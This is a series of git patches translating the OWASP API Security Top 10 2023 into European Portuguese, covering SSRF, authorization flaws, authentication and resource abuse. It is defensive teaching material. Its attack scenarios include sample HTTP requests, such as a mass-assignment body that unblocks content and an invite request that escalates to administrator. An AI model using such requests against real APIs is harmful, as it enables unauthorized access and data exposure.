voo, o utilizador malicioso cancelou todos os bilhetes de uma +vez, o que obrigou a companhia aérea a baixar os preços dos bilhetes para preencher +o voo. -At this point, the user buys herself a single ticket that is much cheaper than -the original one. +Deste modo, o utilizador consegue comprar um bilhete que está muito mais barato do +que o original. ### Cenário #3 -A ride-sharing app provides a referral program - users can invite their friends -and gain credit for each friend who has joined the app. This credit can be later -used as cash to book rides. +Uma aplicação de partilha de boleias oferece um programa de referência - os +utilizadores podem convidar os seus amigos e ganhar crédito por cada amigo que +se juntar à aplicação. Este crédito pode ser posteriormente utilizado como +dinheiro para reservar viagens. -An attacker exploits this flow by writing a script to automate the registration -process, with each new user adding credit to the attacker's wallet. +Um atacante explora este fluxo escrevendo um script para automatizar o processo +de registo, com cada novo utilizador a adicionar crédito à carteira do atacante. -The attacker can later enjoy free rides or sell the accounts with excessive -credits for cash. +O atacante pode posteriormente usufruir de viagens gratuitas ou vender as contas +com créditos excessivos por dinheiro. ## Como Prevenir -The mitigation planning should be done in two layers: - -* Business - identify the business flows that might harm the business if they - are excessively used. -* Engineering - choose the right protection mechanisms to mitigate the business - risk. - - Some of the protection mechanisms are more simple while others are more - difficult to implement. The following methods are used to slow down automated - threats: - - * Device fingerprinting: denying service to unexpected client devices (e.g - headless browsers) tends to make threat actors use more sophisticated - solutions, thus more costly for them - * Human detection: using either captcha or more advanced biometric solutions - (e.g. typing patterns) - * Non-human patterns: analyze the user flow to detect non-human patterns (e.g. - the user accessed the "add to cart" and "complete purchase" functions in - less than one second) - * Consider blocking IP addresses of Tor exit nodes and well-known proxies - - Secure and limit access to APIs that are consumed directly by machines (such - as developer and B2B APIs). They tend to be an easy target for attackers - because they often don't implement all the required protection mechanisms. +O planeamento da mitigação deve ser feito em duas camadas: + +* Negócio - identificar os fluxos de negócio que podem prejudicar a empresa se + forem utilizados em excesso. +* Engenharia - escolher os mecanismos de proteção adequados para mitigar o risco + empresarial. + + Alguns dos mecanismos de proteção são mais simples, enquanto outros são mais + difíceis de implementar. Os seguintes métodos são utilizados para desacelerar + ameaças automatizadas: + + * _Fingerprinting_ de dispositivos: negar serviço a dispositivos de cliente + inesperados (e.g. navegadores _headless_) tende a fazer com que os atacantes + usem soluções mais sofisticadas, tornando-as mais caras para eles. + * Detecção humana: utilize _captcha_ ou soluções biométricas mais avançadas + (e.g. padrões de digitação). + * Padrões não humanos: analisar o fluxo do utilizador para detectar padrões + não humanos (e.g. o utilizador acedeu às funções "adicionar ao carrinho" e + "finalizar compra" em menos de um segundo). + * Considere bloquear endereços IP de nós de saída da rede Tor e proxies bem + conhecidos. + + Proteja e limite o acesso às APIs que são consumidas diretamente por máquinas + (como APIs para desenvolvedores e B2B). Elas tendem a ser um alvo fácil para + atacantes, pois muitas vezes não implementam todos os mecanismos de proteção + necessários. ## Referências From c8e34d46296395dddb308d8cc99c70c295b38e8e Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Mon, 3 Jun 2024 10:37:09 +0100 Subject: [PATCH 42/64] Update 0xa7-server-side-request-forgery.md --- editions/2023/pt-pt/0xa7-server-side-request-forgery.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md index 70bce4868..72e4e5fd7 100644 --- a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md +++ b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md @@ -1,9 +1,9 @@ # API7:2023 Server Side Request Forgery -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Moderate** : Business Specific | -| Exploitation requires the attacker to find an API endpoint that accesses a URI that’s provided by the client. In general, basic SSRF (when the response is returned to the attacker), is easier to exploit than Blind SSRF in which the attacker has no feedback on whether or not the attack was successful. | Modern concepts in application development encourage developers to access URIs provided by the client. Lack of or improper validation of such URIs are common issues. Regular API requests and response analysis will be required to detect the issue. When the response is not returned (Blind SSRF) detecting the vulnerability requires more effort and creativity. | Successful exploitation might lead to internal services enumeration (e.g. port scanning), information disclosure, bypassing firewalls, or other security mechanisms. In some cases, it can lead to DoS or the server being used as a proxy to hide malicious activities. | +| Específico da API : Abuso **Fácil** | Prevalência **Comum** : Detectability **Fácil** | Técnico **Moderado** : Específico do Negócio | +| A exploração requer que o atacante encontre um _endpoint_ da API que aceda a um URI fornecido pelo cliente. Em geral, SSRF básico (quando a resposta é retornada ao atacante) é mais fácil de explorar do que _Blind_ SSRF, em que o atacante não tem feedback sobre se o ataque foi bem sucedido ou não. | Os conceitos modernos no desenvolvimento de aplicações incentivam os desenvolvedores a aceder a URIs fornecidos pelo cliente. A falta de validação ou a validação inadequada desses URIs são problemas comuns. Será necessária a análise regular de solicitações e respostas da API para detectar o problema. Quando a resposta não é retornada (_Blind_ SSRF), a deteção da vulnerabilidade exige mais esforço e criatividade. | Successful exploitation might lead to internal services enumeration (e.g. port scanning), information disclosure, bypassing firewalls, or other security mechanisms. In some cases, it can lead to DoS or the server being used as a proxy to hide malicious activities. | ## Is the API Vulnerable? From 132e1685e71ac19d29b200ac6779090f5320477e Mon Sep 17 00:00:00 2001 From: Hack Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Mon, 3 Jun 2024 12:53:52 +0100 Subject: [PATCH 43/64] Update 0xa7-server-side-request-forgery.md --- .../pt-pt/0xa7-server-side-request-forgery.md | 56 ++++++++++--------- 1 file changed, 29 insertions(+), 27 deletions(-) diff --git a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md index 72e4e5fd7..7e36e4a0e 100644 --- a/editions/2023/pt-pt/0xa7-server-side-request-forgery.md +++ b/editions/2023/pt-pt/0xa7-server-side-request-forgery.md @@ -3,39 +3,41 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Comum** : Detectability **Fácil** | Técnico **Moderado** : Específico do Negócio | -| A exploração requer que o atacante encontre um _endpoint_ da API que aceda a um URI fornecido pelo cliente. Em geral, SSRF básico (quando a resposta é retornada ao atacante) é mais fácil de explorar do que _Blind_ SSRF, em que o atacante não tem feedback sobre se o ataque foi bem sucedido ou não. | Os conceitos modernos no desenvolvimento de aplicações incentivam os desenvolvedores a aceder a URIs fornecidos pelo cliente. A falta de validação ou a validação inadequada desses URIs são problemas comuns. Será necessária a análise regular de solicitações e respostas da API para detectar o problema. Quando a resposta não é retornada (_Blind_ SSRF), a deteção da vulnerabilidade exige mais esforço e criatividade. | Successful exploitation might lead to internal services enumeration (e.g. port scanning), information disclosure, bypassing firewalls, or other security mechanisms. In some cases, it can lead to DoS or the server being used as a proxy to hide malicious activities. | +| A exploração requer que o atacante encontre um _endpoint_ da API que aceda a um URI fornecido pelo cliente. Em geral, SSRF básico (quando a resposta é retornada ao atacante) é mais fácil de explorar do que _Blind_ SSRF, em que o atacante não tem feedback sobre se o ataque foi bem sucedido ou não. | Os conceitos modernos no desenvolvimento de aplicações incentivam os desenvolvedores a aceder a URIs fornecidos pelo cliente. A falta de validação ou a validação inadequada desses URIs são problemas comuns. Será necessária a análise regular de solicitações e respostas da API para detectar o problema. Quando a resposta não é retornada (_Blind_ SSRF), a deteção da vulnerabilidade exige mais esforço e criatividade. | A exploração bem sucedida pode levar à enumeração de serviços internos (e.g. scan de portas), divulgação de informações, bypass de firewalls ou outros mecanismos de segurança. Em alguns casos, pode levar a DoS ou ao uso do servidor como um proxy para ocultar atividades maliciosas. | -## Is the API Vulnerable? +## A API é vulnerável? -Server-Side Request Forgery (SSRF) flaws occur when an API is fetching a remote -resource without validating the user-supplied URL. It enables an attacker to -coerce the application to send a crafted request to an unexpected destination, -even when protected by a firewall or a VPN. +Falhas de Server-Side Request Forgery (SSRF) ocorrem quando uma API pede um +recurso remoto sem validar o URL fornecido pelo utilizador. Isso permite que +um atacante force a aplicação a enviar um pedido manipulado para um destino +inesperado, mesmo quando protegido por uma firewall ou uma VPN. -Modern concepts in application development make SSRF more common and more -dangerous. +Os conceitos modernos no desenvolvimento de aplicações tornam o SSRF mais +comum e mais perigoso. -More common - the following concepts encourage developers to access an external -resource based on user input: Webhooks, file fetching from URLs, custom SSO, -and URL previews. +Mais comum - os seguintes conceitos incentivam os desenvolvedores a aceder +a recursos externos com base em entradas de utilizadores: Webhooks, download +de ficheiros a partir de URLs, SSO personalizado e pré-visualização de URLs. -More dangerous - Modern technologies like cloud providers, Kubernetes, and -Docker expose management and control channels over HTTP on predictable, -well-known paths. Those channels are an easy target for an SSRF attack. +Mais perigoso - Tecnologias modernas como provedores de nuvem, Kubernetes e +Docker expõem canais de gestão e controle via HTTP em caminhos previsíveis +e bem conhecidos. Esses canais são um alvo fácil para um ataque SSRF. -It is also more challenging to limit outbound traffic from your application, -because of the connected nature of modern applications. +Também é mais desafiador limitar o tráfego de saída da sua aplicação, devido +à natureza conectada das aplicações modernas. -The SSRF risk can not always be completely eliminated. While choosing a -protection mechanism, it is important to consider the business risks and needs. +O risco de SSRF nem sempre pode ser completamente eliminado. Ao escolher um +mecanismo de proteção, é importante considerar os riscos e necessidades do +negócio. -## Example Attack Scenarios +## Exemplos de Cenários de Ataque -### Scenario #1 +### Cenário #1 -A social network allows users to upload profile pictures. The user can choose -either to upload the image file from their machine, or provide the URL of the -image. Choosing the second, will trigger the following API call: +Uma rede social permite que os utilizadores façam o upload de fotos de perfil. +O utilizador pode escolher entre carregar o ficheiro de imagem do seu +dispositivo ou fornecer o URL da imagem. Escolher a segunda opção irá acionar +a seguinte chamada API: ``` POST /api/profile/upload_picture @@ -57,7 +59,7 @@ internal network using the API Endpoint. Based on the response time, the attacker can figure out whether the port is open or not. -### Scenario #2 +### Cenário #2 A security product generates events when it detects anomalies in the network. Some teams prefer to review the events in a broader, more generic monitoring @@ -127,7 +129,7 @@ POST /graphql Since the application shows the response from the test request, the attacker can view the credentials of the cloud environment. -## How To Prevent +## Como Prevenir * Isolate the resource fetching mechanism in your network: usually these features are aimed to retrieve remote resources and not internal ones. @@ -142,14 +144,14 @@ can view the credentials of the cloud environment. * Validate and sanitize all client-supplied input data. * Do not send raw responses to clients. -## References +## Referências ### OWASP * [Server Side Request Forgery][1] * [Server-Side Request Forgery Prevention Cheat Sheet][2] -### External +### Externas * [CWE-918: Server-Side Request Forgery (SSRF)][3] * [URL confusion vulnerabilities in the wild: Exploring parser inconsistencies, From 29fe0f7dfd0a71938dc8146f07d21b2b945e0f63 Mon Sep 17 00:00:00 2001 From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 11 Jul 2024 14:26:22 +0100 Subject: [PATCH 44/64] Align text to 80 --- editions/2023/pt-pt/0x00-notice.md | 3 +- editions/2023/pt-pt/0x04-release-notes.md | 23 +++++---- .../0xa1-broken-object-level-authorization.md | 48 ++++++++--------- .../2023/pt-pt/0xa2-broken-authentication.md | 28 +++++----- ...ken-object-property-level-authorization.md | 51 +++++++++---------- .../0xa4-unrestricted-resource-consumption.md | 51 +++++++++---------- ...xa5-broken-function-level-authorization.md | 10 +--- ...cted-access-to-sensitive-business-flows.md | 47 +++++++++-------- .../pt-pt/0xa7-server-side-request-forgery.md | 28 +++++----- 9 files changed, 141 insertions(+), 148 deletions(-) diff --git a/editions/2023/pt-pt/0x00-notice.md b/editions/2023/pt-pt/0x00-notice.md index 275675afc..70f915752 100644 --- a/editions/2023/pt-pt/0x00-notice.md +++ b/editions/2023/pt-pt/0x00-notice.md @@ -1,6 +1,7 @@ # Nota -Esta é a versão de texto do OWASP API Security Top 10, usada como fonte para quaisquer versões oficiais deste documento como por exemplo o website. +Esta é a versão de texto do OWASP API Security Top 10, usada como fonte para +quaisquer versões oficiais deste documento como por exemplo o website. Contribuições para o projeto tais como comentários, correções ou traduções devem ser feitas aqui. Para mais detalhes sobre [Como Contribuir][1], por favor diff --git a/editions/2023/pt-pt/0x04-release-notes.md b/editions/2023/pt-pt/0x04-release-notes.md index a2d8274bb..3f3f32672 100644 --- a/editions/2023/pt-pt/0x04-release-notes.md +++ b/editions/2023/pt-pt/0x04-release-notes.md @@ -18,24 +18,25 @@ detalhes sobre os riscos de segurança, consulte a [secção Riscos de Seguranç em APIs][3]. O OWASP API Security Top 10 2023 é um documento de sensibilização prospetivo -para uma indústria de ritmo acelerado. Não substitui outros TOP 10. Nesta edição: +para uma indústria de ritmo acelerado. Não substitui outros TOP 10. Nesta +edição: * Combinámos *Excessive Data Exposure* e *Mass Assignment*, focando na causa comum: falhas na validação de autorização ao nível das propriedades do objeto. -* Damos mais ênfase ao consumo de recursos, em vez de nos concentrarmos na rapidez - com que são esgotados. +* Damos mais ênfase ao consumo de recursos, em vez de nos concentrarmos na + rapidez com que são esgotados. * Criámos uma nova categoria "*Unrestricted Access to Sensitive Business Flows*" - para abordar novas ameaças, incluindo a maioria daquelas que podem ser mitigadas - através de *rate limiting*. + para abordar novas ameaças, incluindo a maioria daquelas que podem ser + mitigadas através de *rate limiting*. * Adicionámos "*Unsafe Consumption of APIs*" para abordar algo que começámos a - observar: os atacantes começaram a procurar serviços integrados de um alvo para - os comprometer, em vez de atingirem diretamente as APIs do seu alvo. Este é o - momento certo para começar a sensibilizar sobre este risco crescente. + observar: os atacantes começaram a procurar serviços integrados de um alvo + para os comprometer, em vez de atingirem diretamente as APIs do seu alvo. Este + é o momento certo para começar a sensibilizar sobre este risco crescente. As APIs desempenham um papel cada vez mais importante na arquitetura moderna de -microsserviços, *Single Page Applications* (SPAs), aplicações móveis, Internet das -Coisas (IoT), etc. O OWASP API Security Top 10 é um esforço necessário para criar -sensibilização sobre os problemas de segurança modernos das APIs. +microsserviços, *Single Page Applications* (SPAs), aplicações móveis, Internet +das Coisas (IoT), etc. O OWASP API Security Top 10 é um esforço necessário para +criar sensibilização sobre os problemas de segurança modernos das APIs. Esta atualização só foi possível devido ao grande esforço de vários voluntários, listados na secção de [Agradecimentos][4]. diff --git a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md index 4ef1fe3a8..2d12ea930 100644 --- a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md +++ b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md @@ -8,27 +8,27 @@ ## A API é vulnerável? A autorização de acesso ao nível do objeto é um mecanismo de controlo que -geralmente é implementado ao nível do código para validar que um utilizador -só pode aceder aos objetos aos quais deveria ter permissão para aceder. +geralmente é implementado ao nível do código para validar que um utilizador só +pode aceder aos objetos aos quais deveria ter permissão para aceder. -Cada *endpoint* de API que recebe um ID de um objeto e realiza alguma ação -sobre o objeto deve implementar verificações de autorização ao nível do -objeto. As verificações devem validar que o utilizador autenticado tem -permissões para realizar a ação solicitada sobre o objeto alvo. +Cada *endpoint* de API que recebe um ID de um objeto e realiza alguma ação sobre +o objeto deve implementar verificações de autorização ao nível do objeto. As +verificações devem validar que o utilizador autenticado tem permissões para +realizar a ação solicitada sobre o objeto alvo. As falhas neste mecanismo geralmente conduzem à divulgação não autorizada de informações, modificação ou destruição de todos os dados. -Comparar o ID do utilizador da sessão atual (e.g. ao extraí-lo do -token JWT) com o parâmetro de ID vulnerável não é uma solução suficiente -para resolver a falha de Broken Object Level Authorization (BOLA). Esta -abordagem pode endereçar apenas um pequeno subconjunto de casos. +Comparar o ID do utilizador da sessão atual (e.g. ao extraí-lo do token JWT) com +o parâmetro de ID vulnerável não é uma solução suficiente para resolver a falha +de Broken Object Level Authorization (BOLA). Esta abordagem pode endereçar +apenas um pequeno subconjunto de casos. -No caso de BOLA, é por design que o utilizador tem acesso ao -*endpoint*/função da API vulnerável. A violação ocorre ao nível do objeto, -através da manipulação do ID. Se um atacante conseguir aceder a um -*endpoint*/função da API ao qual não deveria ter acesso - este é um caso de -[Broken Function Level Authorization][5] (BFLA) em vez de BOLA. +No caso de BOLA, é por design que o utilizador tem acesso ao *endpoint*/função +da API vulnerável. A violação ocorre ao nível do objeto, através da manipulação +do ID. Se um atacante conseguir aceder a um *endpoint*/função da API ao qual não +deveria ter acesso - este é um caso de [Broken Function Level Authorization][5] +(BFLA) em vez de BOLA. ## Exemplos de Cenários de Ataque @@ -47,20 +47,20 @@ online. ### Cenário #2 Um fabricante de automóveis habilitou o controlo remoto dos seus veículos -através de uma API para comunicação com o telemóvel do condutor. A API -permite ao condutor iniciar e parar o motor e trancar e destrancar as portas +através de uma API para comunicação com o telemóvel do condutor. A API permite +ao condutor iniciar e parar o motor e trancar e destrancar as portas remotamente. Como parte deste processo, o utilizador envia o Número de -Identificação do Veículo (VIN) para a API. -No entanto, a API não valida se o VIN representa um veículo que pertence ao -utilizador autenticado, o que resulta numa vulnerabilidade de BOLA. Um atacante -pode aceder a veículos que não lhe pertencem. +Identificação do Veículo (VIN) para a API. No entanto, a API não valida se o VIN +representa um veículo que pertence ao utilizador autenticado, o que resulta numa +vulnerabilidade de BOLA. Um atacante pode aceder a veículos que não lhe +pertencem. ### Cenário #3 Um serviço de armazenamento de documentos online permite aos utilizadores -visualizar, editar, armazenar e eliminar os seus documentos. Quando um -documento de um utilizador é eliminado, é enviada uma mutação GraphQL com o ID -do documento para a API. +visualizar, editar, armazenar e eliminar os seus documentos. Quando um documento +de um utilizador é eliminado, é enviada uma mutação GraphQL com o ID do +documento para a API. ``` POST /graphql diff --git a/editions/2023/pt-pt/0xa2-broken-authentication.md b/editions/2023/pt-pt/0xa2-broken-authentication.md index b8359f20e..3c57c44f8 100644 --- a/editions/2023/pt-pt/0xa2-broken-authentication.md +++ b/editions/2023/pt-pt/0xa2-broken-authentication.md @@ -7,9 +7,9 @@ ## A API é vulnerável? -Os _endpoints_ e fluxos de autenticação são ativos que carecem de proteção. -Além disso, mecanismos de recuperação de _password_ devem ser tratados da mesma -forma que os mecanismos de autenticação. +Os _endpoints_ e fluxos de autenticação são ativos que carecem de proteção. Além +disso, mecanismos de recuperação de _password_ devem ser tratados da mesma forma +que os mecanismos de autenticação. Uma API é vulnerável se: @@ -20,8 +20,8 @@ Uma API é vulnerável se: excesso de tentativas de autenticação falhadas. * Permite a utilização de _passwords_ fracas. * Envia informação de autenticação, tal como _tokens_ e _passwords_, no URL. -* Permite que os utilizadores alterem o seu endereço de email, _password_ atual ou - realizem outras operações sensíveis sem pedir a confirmação da _password_. +* Permite que os utilizadores alterem o seu endereço de email, _password_ atual + ou realizem outras operações sensíveis sem pedir a confirmação da _password_. * Não valida a autenticidade dos _tokens_ de autenticação. * Aceita _tokens_ JWT sem que estes sejam assinados/usando algoritmos fracos `("alg":"none")` @@ -38,8 +38,8 @@ Além disso, um microsserviço é vulnerável se: ## Cenário #1 -Para realizar a autenticação do utilizador, o cliente tem de enviar um pedido -de API como o exemplo abaixo, com as credenciais do utilizador: +Para realizar a autenticação do utilizador, o cliente tem de enviar um pedido de +API como o exemplo abaixo, com as credenciais do utilizador: ``` POST /graphql @@ -52,9 +52,9 @@ POST /graphql } ``` -Se as credenciais forem válidas, é devolvido um token de autenticação que -deve ser fornecido em pedidos subsequentes para identificar o utilizador. -A quantidade de tentativas de login está sujeita a uma limitação temporal +Se as credenciais forem válidas, é devolvido um token de autenticação que deve +ser fornecido em pedidos subsequentes para identificar o utilizador. A +quantidade de tentativas de login está sujeita a uma limitação temporal restritiva: apenas três pedidos são permitidos por minuto. Para efetuar login por força bruta com a conta de uma vítima, os atores @@ -85,10 +85,10 @@ Authorization: Bearer ``` Devido à API não exigir que os utilizadores confirmem a sua identidade -fornecendo a sua _password_ atual, atores maliciosos que consigam colocar-se numa -posição de roubar o token de autenticação podem conseguir assumir a conta da -vítima ao iniciar o processo de redefinição de senha após atualizar o endereço -de email da conta da vítima. +fornecendo a sua _password_ atual, atores maliciosos que consigam colocar-se +numa posição de roubar o token de autenticação podem conseguir assumir a conta +da vítima ao iniciar o processo de redefinição de senha após atualizar o +endereço de email da conta da vítima. ## Como Prevenir diff --git a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md index b82db1bdb..e6573388a 100644 --- a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md +++ b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md @@ -7,9 +7,9 @@ ## A API é vulnerável? -Ao permitir que um utilizador aceda a um objeto através de um _endpoint_ da -API, é importante validar que o utilizador tem acesso às propriedades -específicas do objeto que está a tentar aceder. +Ao permitir que um utilizador aceda a um objeto através de um _endpoint_ da API, +é importante validar que o utilizador tem acesso às propriedades específicas do +objeto que está a tentar aceder. Um _endpoint_ de uma API é vulnerável se: @@ -50,17 +50,17 @@ POST /graphql } ``` -O endpoint da API é vulnerável porque permite que o utilizador autenticado -tenha acesso a propriedades sensíveis do utilizador denunciado, como -"fullName" (nome completo) e "recentLocation" (localização recente), que não -deveriam estar accessíveis a outros utilizadores. +O endpoint da API é vulnerável porque permite que o utilizador autenticado tenha +acesso a propriedades sensíveis do utilizador denunciado, como "fullName" (nome +completo) e "recentLocation" (localização recente), que não deveriam estar +acessíveis a outros utilizadores. ### Cenário #2 Uma plataforma de mercado online, que permite a um tipo de utilizadores ('anfitriões') alugar o seu apartamento a outro tipo de utilizadores -('hóspedes'), requer que o anfitrião aceite uma reserva feita por um -hóspede antes de cobrar ao hóspede pela estadia. +('hóspedes'), requer que o anfitrião aceite uma reserva feita por um hóspede +antes de cobrar ao hóspede pela estadia. Como parte deste processo, é feito um pedido de API pelo anfitrião para `POST /api/host/approve_booking` com o seguinte conteúdo legítimo: @@ -88,10 +88,9 @@ hóspede vai ser cobrado mais do que deveria. ### Cenário #3 -Uma rede social baseada em vídeos curtos, impõe filtros restritivos de -conteúdo e censura. Mesmo que um vídeo carregado seja bloqueado, o -utilizador pode alterar a descrição do vídeo utilizando o seguinte pedido à -API: +Uma rede social baseada em vídeos curtos, impõe filtros restritivos de conteúdo +e censura. Mesmo que um vídeo carregado seja bloqueado, o utilizador pode +alterar a descrição do vídeo utilizando o seguinte pedido à API: ``` PUT /api/video/update_video @@ -101,8 +100,8 @@ PUT /api/video/update_video } ``` -Um utilizador frustrado pode reenviar o pedido legítimo e adicionar o -seguinte conteúdo malicioso: +Um utilizador frustrado pode reenviar o pedido legítimo e adicionar o seguinte +conteúdo malicioso: ``` { @@ -111,15 +110,15 @@ seguinte conteúdo malicioso: } ``` -O _endpoint_ da API é vulnerável porque não há validação se o utilizador -deve ter acesso à propriedade interna do objeto - `blocked`, e o utilizador -pode alterar o valor de `true` para `false` e desbloquear o seu próprio -conteúdo bloqueado. +O _endpoint_ da API é vulnerável porque não há validação se o utilizador deve +ter acesso à propriedade interna do objeto - `blocked`, e o utilizador pode +alterar o valor de `true` para `false` e desbloquear o seu próprio conteúdo +bloqueado. ## Como Prevenir -* Ao expor um objeto através de um _endpoint_ da API, certifique-se sempre - de que o utilizador deve ter acesso às propriedades do objeto que expõe. +* Ao expor um objeto através de um _endpoint_ da API, certifique-se sempre de + que o utilizador deve ter acesso às propriedades do objeto que expõe. * Evite usar métodos genéricos como `to_json()` e `to_string()`. Em vez disso, selecione especificamente as propriedades do objeto que deseja retornar. * Se possível, evite usar funções que automaticamente vinculem os dados @@ -127,11 +126,11 @@ conteúdo bloqueado. propriedades de objetos ("Mass Assignment"). * Permita alterações apenas nas propriedades do objeto que devam ser atualizadas pelo cliente. -* Implemente um mecanismo de validação de resposta baseado num esquema como - uma camada extra de segurança. Como parte deste mecanismo, defina e imponha - que dados são retornados por todos os métodos da API. -* Mantenha as estruturas de dados retornadas ao mínimo essencial, de acordo - com os requisitos comerciais/funcionais para o _endpoint_. +* Implemente um mecanismo de validação de resposta baseado num esquema como uma + camada extra de segurança. Como parte deste mecanismo, defina e imponha que + dados são retornados por todos os métodos da API. +* Mantenha as estruturas de dados retornadas ao mínimo essencial, de acordo com + os requisitos comerciais/funcionais para o _endpoint_. ## Referências diff --git a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md index b1cbaa202..1d9f4e933 100644 --- a/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md +++ b/editions/2023/pt-pt/0xa4-unrestricted-resource-consumption.md @@ -31,11 +31,11 @@ definido inadequadamente (e.g. muito baixo/alto): ### Cenário #1 Uma rede social implementou um mecanismo de "recuperar senha" através da -verificação por SMS, permitindo que o utilizador receba um _token_ de uso -único via SMS para redefinir a sua senha. +verificação por SMS, permitindo que o utilizador receba um _token_ de uso único +via SMS para redefinir a sua senha. -Uma vez que o utilizador clica em "recuperar senha", é feita uma chamada API -a partir do navegador do utilizador para a API de _back-end_: +Uma vez que o utilizador clica em "recuperar senha", é feita uma chamada API a +partir do navegador do utilizador para a API de _back-end_: ``` POST /initiate_forgot_password @@ -68,7 +68,8 @@ em questão de minutos. ### Cenário #2 -Um _endpoint_ de API GraphQL permite que o utilizador carregue uma foto de perfil. +Um _endpoint_ de API GraphQL permite que o utilizador carregue uma foto de +perfil. ``` POST /graphql @@ -114,9 +115,9 @@ serviço (_Denial of Service_). Um prestador de serviços permite que os clientes descarreguem ficheiros arbitrariamente grandes através da sua API. Estes ficheiros são mantidos em armazenamento de objetos na nuvem e não mudam com frequência. O prestador de -serviços depende de um serviço de _cache_ para melhorar a velocidade do serviço e -manter o consumo de largura de banda baixo. O serviço de _cache_ apenas armazena -ficheiros até 15GB. +serviços depende de um serviço de _cache_ para melhorar a velocidade do serviço +e manter o consumo de largura de banda baixo. O serviço de _cache_ apenas +armazena ficheiros até 15GB. Quando um dos ficheiros é atualizado, o seu tamanho aumenta para 18GB. Todos os clientes do serviço começam imediatamente a descarregar a nova versão. Como não @@ -130,28 +131,22 @@ dólares. [número de reinícios][3], [descritores de ficheiros e processos][4], como Containers / Código Serverless (e.g. Lambdas). * Defina e force um tamanho máximo de dados em todos os parâmetros e conteúdos - de entrada, como comprimento máximo para _strings_, número máximo de elementos - em arrays e tamanho máximo de ficheiro para _upload_ (independentemente de - ser armazenado localmente ou na nuvem). -* Implemente um limite de frequência com que um cliente pode interagir com a - API dentro de um período temporal definido (_rate limiting_). + de entrada, como comprimento máximo para _strings_, número máximo de + elementos em arrays e tamanho máximo de ficheiro para _upload_ + (independentemente de ser armazenado localmente ou na nuvem). +* Implemente um limite de frequência com que um cliente pode interagir com a API + dentro de um período temporal definido (_rate limiting_). * A limitação de pedidos deve ser ajustada com base nas necessidades do negócio. Alguns endpoints da API podem exigir políticas mais rigorosas. -* Limite/controle quantas vezes ou com que frequência um único cliente/utilizador - da API pode executar uma única operação (e.g. validar um OTP ou solicitar - a recuperação de senha sem visitar o URL de uso único). -* Add proper server-side validation for query string and request body - parameters, specifically the one that controls the number of records to be - returned in the response. -* Adicione validação adequada no lado do servidor para parâmetros da _query string_ - e do corpo do pedido, especificamente aqueles que controlam o número de resultados - a serem retornados na resposta. -* Configure spending limits for all service providers/API integrations. When - setting spending limits is not possible, billing alerts should be configured - instead. -* Configure limites de gastos para todos os fornecedores de serviços/integracões de - API. Quando não for possível definir limites de gastos, devem ser configurados - alertas de faturamento. +* Limite/controle quantas vezes ou com que frequência um único + cliente/utilizador da API pode executar uma única operação (e.g. validar um + OTP ou solicitar a recuperação de senha sem visitar o URL de uso único). +* Adicione validação adequada no lado do servidor para parâmetros da + _query string_ e do corpo do pedido, especificamente aqueles que controlam o + número de resultados a serem retornados na resposta. +* Configure limites de gastos para todos os fornecedores de serviços/integrações + de API. Quando não for possível definir limites de gastos, devem ser + configurados alertas de faturamento. ## Referências diff --git a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md index 234e010a1..91039d83f 100644 --- a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md +++ b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md @@ -42,7 +42,8 @@ Um atacante duplica o pedido e manipula o método HTTP e o _endpoint_ para administradores através da consola de administração. O _endpoint_ não implementa verificações de autorização de acesso à função. -O atacante explora a falha e envia um novo convite com privilégios de administrador: +O atacante explora a falha e envia um novo convite com privilégios de +administrador: ``` POST /api/invites/new @@ -58,13 +59,6 @@ de administrador e obter acesso total ao sistema. ### Cenário #2 -An API contains an endpoint that should be exposed only to administrators - -`GET /api/admin/v1/users/all`. This endpoint returns the details of all the -users of the application and does not implement function level authorization -checks. An attacker who learned the API structure takes an educated guess and -manages to access this endpoint, which exposes sensitive details of the users -of the application. - Uma API contém um _endpoint_ que deveria ser exposto apenas a administradores - `GET /api/admin/v1/users/all`. Este _endpoint_ retorna os detalhes de todos os utilizadores da aplicação e não implementa verificações de autorização de acesso diff --git a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md index ef321c8bb..e419ed906 100644 --- a/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md +++ b/editions/2023/pt-pt/0xa6-unrestricted-access-to-sensitive-business-flows.md @@ -15,26 +15,28 @@ Exemplos comuns de fluxos de negócios sensíveis e o risco de acesso excessivo associado a eles: * Fluxo de compra de um produto - um atacante pode comprar todo o stock de um - item de alta procura de uma só vez e revendê-lo por um preço mais alto (scalping). -* Fluxo de criação de comentário/publicação - um atacante pode inundar o sistema com spam. -* Realização de uma reserva - um atacante pode reservar todos os horários disponíveis - e impedir que outros utilizadores utilizem o sistema. + item de alta procura de uma só vez e revendê-lo por um preço mais alto + (scalping). +* Fluxo de 